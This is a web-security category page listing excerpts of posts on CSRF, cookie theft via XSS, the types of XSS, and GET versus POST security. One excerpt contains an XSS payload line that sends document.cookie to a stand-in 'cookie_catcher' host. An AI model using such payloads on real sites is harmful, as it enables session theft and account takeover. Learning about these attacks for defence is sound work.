Category: Web
How to make CSRF attack using POST request
Imagine if www.example.com processed fund transfers through a GET request that will include two parameters: the amount that is to be transferred and the identifier of the account to which the money will be...
How to steal user cookies using XSS attack
We know that it is possible to steal the cookie by redirecting to “False” page etc like this document.location= “http://www.example.com/cookie_catcher.php?c=” + document.cookie But how to do without redirecting the user? If you have full...
What is difference between reflected XSS and stored XSS
Cross-site scripting attacks may occur anywhere that possibly malicious users are allowed to post unregulated material to a trusted web site for the consumption of other valid users. The most common example can be...
GET vs POST request. Why POST is more secured?
The GET request is marginally less secure than the POST request. Neither offers true “security” by itself; using POST requests will not magically make your website secure against malicious attacks by a noticeable amount. However, using...
